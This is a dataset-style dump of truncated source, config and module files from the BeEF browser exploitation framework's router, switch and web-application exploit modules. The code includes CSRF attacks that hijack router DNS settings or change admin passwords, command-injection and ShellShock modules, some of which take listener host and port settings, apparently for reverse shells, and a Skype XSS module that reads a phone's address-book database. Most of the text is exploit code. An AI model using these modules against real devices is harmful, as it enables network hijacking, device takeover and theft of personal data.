language stringlengths 0 24 | filename stringlengths 9 214 | code stringlengths 99 9.93M |
|---|---|---|
YAML | beef/modules/exploits/router/linksys_wrt54g_csrf/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
linksys_wrt54g_csrf:
enable: true
category: ["Exploits", "Router"]
name: "Link... |
Ruby | beef/modules/exploits/router/linksys_wrt54g_csrf/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Linksys_wrt54g_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value' ... |
JavaScript | beef/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var base = '<%= @base %>';
var sourceip = '<%= @sourceip %>';
var port = '<%= @port %>';
var acl = sour... |
YAML | beef/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
Netgear_dgn_2000_wan_mgmt_csrf:
enable: true
category: [ "Exploits", "Router" ]
... |
Ruby | beef/modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Netgear_dgn_2000_wan_mgmt_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router URL', 'v... |
JavaScript | beef/modules/exploits/router/netgear_dgn2200_cmd_exec/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var cmd = '<%= Base64.strict_encode64(@cmd) %>';
var timeout = 15;
var ne... |
YAML | beef/modules/exploits/router/netgear_dgn2200_cmd_exec/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
netgear_dgn2200_cmd_exec:
enable: true
category: ["Exploits", "Router"]
name: ... |
Ruby | beef/modules/exploits/router/netgear_dgn2200_cmd_exec/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Netgear_dgn2200_cmd_exec < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'IP address', 'value'... |
JavaScript | beef/modules/exploits/router/phillips_dns_hijack/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/cgi-bin/setup_dns.exe';
var dns1 = '<%= @dns1 %>';
var ... |
YAML | beef/modules/exploits/router/phillips_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# https://bugzilla.mozilla.org/show_bug.cgi?id=371598
# http://www.gnucitizen.org/blog/router-hacking-challenge/
#
beef:
m... |
Ruby | beef/modules/exploits/router/phillips_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
class Philips_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '19... |
JavaScript | beef/modules/exploits/router/pikatel_96338_dns_hijack/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/dnscfg.cgi';
var dns1 = '<%= @dns1 %>';
var dns2 = '... |
YAML | beef/modules/exploits/router/pikatel_96338_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# https://www.exploit-db.com/exploits/40369/
#
beef:
module:
pikatel_96338_dns_hijack:
enable: true
... |
Ruby | beef/modules/exploits/router/pikatel_96338_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Pikatel_96338_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value... |
JavaScript | beef/modules/exploits/router/planet_vdr300nu_adsl_dns_hijack/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/dnscfg.cgi';
var dns1 = '<%= @dns1 %>';
var dns2 = '... |
YAML | beef/modules/exploits/router/planet_vdr300nu_adsl_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# https://www.exploit-db.com/exploits/40370/
#
beef:
module:
planet_vdr300nu_adsl_dns_hijack:
enable: ... |
Ruby | beef/modules/exploits/router/planet_vdr300nu_adsl_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Planet_vdr300nu_adsl_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host',... |
JavaScript | beef/modules/exploits/router/shuttle_tech_915wm_dns_hijack/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/dnscfg.cgi';
var dns1 = '<%= @dns1 %>';
var dns2 = ... |
YAML | beef/modules/exploits/router/shuttle_tech_915wm_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# http://www.exploit-db.com/exploits/35995/
#
beef:
module:
shuttle_tech_915wm_dns_hijack:
enable: tru... |
Ruby | beef/modules/exploits/router/shuttle_tech_915wm_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Shuttle_tech_915wm_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', '... |
JavaScript | beef/modules/exploits/router/telstra_zte_mf91_change_pw/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var password = '<%= @password %>';
var timeout = 15;
var telstra_zte_m... |
YAML | beef/modules/exploits/router/telstra_zte_mf91_change_pw/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# http://www.sw1tch.net/blog/pwning-telstras-zte-mf91-4g-modem
# http://www.zte.com.au/downloads/manuals/MF91_Help.pdf
#
beef:... |
Ruby | beef/modules/exploits/router/telstra_zte_mf91_change_pw/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Telstra_zte_mf91_change_pw < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Target', 'value' =... |
JavaScript | beef/modules/exploits/router/telstra_zte_mf91_change_ssid/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var ssid = '<%= @ssid %>';
var timeout = 15;
var telstra_zte_mf91_ifra... |
YAML | beef/modules/exploits/router/telstra_zte_mf91_change_ssid/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# http://www.sw1tch.net/blog/pwning-telstras-zte-mf91-4g-modem
# http://www.zte.com.au/downloads/manuals/MF91_Help.pdf
#
beef:... |
Ruby | beef/modules/exploits/router/telstra_zte_mf91_change_ssid/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Telstra_zte_mf91_change_ssid < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Target', 'value'... |
JavaScript | beef/modules/exploits/router/telstra_zte_mf91_disable_ap_isolation/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var timeout = 15;
var telstra_zte_mf91_iframe_<%= @command_id %> = beef.... |
YAML | beef/modules/exploits/router/telstra_zte_mf91_disable_ap_isolation/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# http://www.sw1tch.net/blog/pwning-telstras-zte-mf91-4g-modem
# http://www.zte.com.au/downloads/manuals/MF91_Help.pdf
#
beef:... |
Ruby | beef/modules/exploits/router/telstra_zte_mf91_disable_ap_isolation/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Telstra_zte_mf91_disable_ap_isolation < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Target'... |
JavaScript | beef/modules/exploits/router/tenda_adsl_dns_hijack/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/dnscfg.cgi';
var dns1 = '<%= @dns1 %>';
var dns2 = '... |
YAML | beef/modules/exploits/router/tenda_adsl_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# https://www.exploit-db.com/exploits/40371/
# https://www.exploit-db.com/exploits/41078/
# https://www.exploit-db.com/exploit... |
Ruby | beef/modules/exploits/router/tenda_adsl_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Tenda_adsl_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' =... |
JavaScript | beef/modules/exploits/router/tplink_dns_csrf/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var dhcp_start = '192.168.1.100';
var dhcp_end = '192.168.1.199';
var target = 'http://<%= ... |
YAML | beef/modules/exploits/router/tplink_dns_csrf/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# CVE-2013-2645
# http://securityevaluators.com/knowledge/case_studies/routers/tp-link_wr1043n.php
# http://www.jakoblell.com/... |
Ruby | beef/modules/exploits/router/tplink_dns_csrf/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Tplink_dns_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192... |
JavaScript | beef/modules/exploits/router/utstarcom_wa3002g4_dns_hijack/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// config
var target = 'http://<%= @rhost %>/dnscfg.cgi';
var dns1 = '<%= @dns1 %>';
var dns2 = '... |
YAML | beef/modules/exploits/router/utstarcom_wa3002g4_dns_hijack/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# References:
# https://www.exploit-db.com/exploits/42194/
#
beef:
module:
utstarcom_wa3002g4_dns_hijack:
enable: tr... |
Ruby | beef/modules/exploits/router/utstarcom_wa3002g4_dns_hijack/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Utstarcom_wa3002g4_dns_hijack < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', '... |
JavaScript | beef/modules/exploits/router/virgin_superhub_csrf/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var port = '<%= @port %>';
var time... |
YAML | beef/modules/exploits/router/virgin_superhub_csrf/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
virgin_superhub_csrf:
enable: true
category: ["Exploits", "Router"]
name: "Vir... |
Ruby | beef/modules/exploits/router/virgin_superhub_csrf/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Virgin_superhub_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value'... |
JavaScript | beef/modules/exploits/router/wipg1000_cmd_injection/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var lhost = '<%= @lhost %>';
var lport = '... |
YAML | beef/modules/exploits/router/wipg1000_cmd_injection/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
wipg1000_cmd_injection:
enable: true
category: ["Exploits", "Router"]
name: "W... |
Ruby | beef/modules/exploits/router/wipg1000_cmd_injection/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Wipg1000_cmd_injection < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
lhost = @c... |
JavaScript | beef/modules/exploits/ruby_nntpd_cmd_exec/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var timeout = '<%= @timeout %>';
// vali... |
YAML | beef/modules/exploits/ruby_nntpd_cmd_exec/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
ruby_nntpd_cmd_exec:
enable: true
category: "Exploits"
name: "ruby-nntpd Comma... |
Ruby | beef/modules/exploits/ruby_nntpd_cmd_exec/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
###
# ruby-nntpd homepage: http://code.google.com/p/ruby-nntpd/
###
class Ruby_nntpd_cmd_exec < BeEF::Core::Command
def self.options
[
... |
JavaScript | beef/modules/exploits/shell_shocked/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function () {
try {
var target = "<%=@Target%>";
var command = "<%=@Bash_Command%>";
var meth... |
YAML | beef/modules/exploits/shell_shocked/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
Shell_shocked:
enable: true
category: "Exploits"
name: "Shell Shock"
... |
Ruby | beef/modules/exploits/shell_shocked/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Shell_shocked < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = configuratio... |
JavaScript | beef/modules/exploits/shell_shock_scanner/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rproto = '<%= @rproto %>';
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var lhost =... |
YAML | beef/modules/exploits/shell_shock_scanner/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
shell_shock_scanner:
enable: true
category: "Exploits"
name: "Shell Shock Scan... |
Ruby | beef/modules/exploits/shell_shock_scanner/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Shell_shock_scanner < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = config... |
beef/modules/exploits/shell_shock_scanner/shocker-cgi_list | # Resource file for shocker.py
# List of pages/scripts potentially vulnerable to Shellshock
# One per line, no commas, spaces, tabs, etc.
# Credits to the following from whence many were borrowed:
# https://github.com/mubix/shellshocker-pocs/blob/master/shell_sprayer.py
# http://patrickpierson.us/wp-content/uploads/201... | |
beef/modules/exploits/shell_shock_scanner/update-list | #!/bin/sh
echo "[*] Deleting old shocker-cgi_list..."
rm shocker-cgi_list
echo "[*] Downloading latest shocker-cgi_list..."
wget "https://raw.githubusercontent.com/nccgroup/shocker/master/shocker-cgi_list" | |
JavaScript | beef/modules/exploits/skype_xss/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
x = new XMLHttpRequest;
x.open("get","file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb");
x.ov... |
YAML | beef/modules/exploits/skype_xss/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
skype_xss:
enable: true
category: "Exploits"
name: "Skype iPhone XSS Steal Con... |
Ruby | beef/modules/exploits/skype_xss/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Skype_xss < BeEF::Core::Command
def post_execute
# #Stub##
save({ 'result' => @datastore['result'] })
end
end |
JavaScript | beef/modules/exploits/spring_framework_malicious_jar/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
jar_file = "<%= @jar_file %>";
form_controller = "<%= @form_controller %>";
uri = form_contro... |
YAML | beef/modules/exploits/spring_framework_malicious_jar/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
spring_framework_malicious_jar:
enable: true
category: "Exploits"
name: "Sprin... |
Ruby | beef/modules/exploits/spring_framework_malicious_jar/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Spring_framework_malicious_jar < BeEF::Core::Command
def self.options
[
{ 'name' => 'form_controller', 'ui_label' => 'Form... |
JavaScript | beef/modules/exploits/switch/dlink_dgs_1100_device_reset/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// Hooked browser must be authenticated to switch.
var base = '<%= @base %>';
var dlink_dgs_iframe = ... |
YAML | beef/modules/exploits/switch/dlink_dgs_1100_device_reset/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
Dlink_dgs_1100_device_reset_csrf:
enable: true
category: ["Exploits", "Switch"]
... |
Ruby | beef/modules/exploits/switch/dlink_dgs_1100_device_reset/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Dlink_dgs_1100_device_reset_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Switch web ro... |
JavaScript | beef/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// Hooked browser must be authenticated to switch.
var base = '<%= @base %>';
var port = '<%= @port %>... |
YAML | beef/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
Dlink_dgs_1100_fdb_whitelist_csrf:
enable: true
category: ["Exploits", "Switch"]
... |
Ruby | beef/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Dlink_dgs_1100_fdb_whitelist_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Switch web r... |
JavaScript | beef/modules/exploits/switch/dlink_dgs_1100_port_mirroring/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// Hooked browser must be authenticated to switch.
var base = '<%= @base %>';
var totalports = parseIn... |
YAML | beef/modules/exploits/switch/dlink_dgs_1100_port_mirroring/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
Dlink_dgs_1100_port_mirroring_csrf:
enable: true
category: ["Exploits", "Switch"]
... |
Ruby | beef/modules/exploits/switch/dlink_dgs_1100_port_mirroring/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Dlink_dgs_1100_port_mirroring_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Switch web ... |
JavaScript | beef/modules/exploits/switch/netgear_gs108t_csrf/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var base = '<%= @base %>';
var oldpassword = '<%= @oldpassword %>';
var newpassword = '<%= @newpasswor... |
YAML | beef/modules/exploits/switch/netgear_gs108t_csrf/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
Netgear_gs108t_csrf:
enable: true
category: ["Exploits", "Switch"]
name: "Netg... |
Ruby | beef/modules/exploits/switch/netgear_gs108t_csrf/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Netgear_gs108t_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Switch web root', 'value' ... |
JavaScript | beef/modules/exploits/vtiger_crm_upload_exploit/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// VtigerCRM <= 5.0.4 "chained exploitation" PoC
// Hacked up for OWASP New Zealand Day, July 13th 2009
//
// Thanks for the BeEF Wad... |
YAML | beef/modules/exploits/vtiger_crm_upload_exploit/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
vtiger_crm_upload_exploit:
enable: true
category: "Exploits"
name: "VTiger CRM... |
Ruby | beef/modules/exploits/vtiger_crm_upload_exploit/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Vtiger_crm_upload_exploit < BeEF::Core::Command
def self.options
time = Time.new
weekno = case time.day
when 1.... |
JavaScript | beef/modules/exploits/wanem_command_execution/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var lhost = '<%= @lhost %>';
var lport = ... |
YAML | beef/modules/exploits/wanem_command_execution/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
################################################################################
# For more information see: http://itsecuritysolutions.org/... |
Ruby | beef/modules/exploits/wanem_command_execution/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
################################################################################
# For more information see: http://itsecuritysolutions.org... |
JavaScript | beef/modules/exploits/wifi_pineapple_csrf/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var timeout = 15;
var wifi_pineapp... |
YAML | beef/modules/exploits/wifi_pineapple_csrf/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
wifi_pineapple_csrf:
enable: false
category: "Exploits"
name: "WiFi Pineapple ... |
Ruby | beef/modules/exploits/wifi_pineapple_csrf/module.rb | #
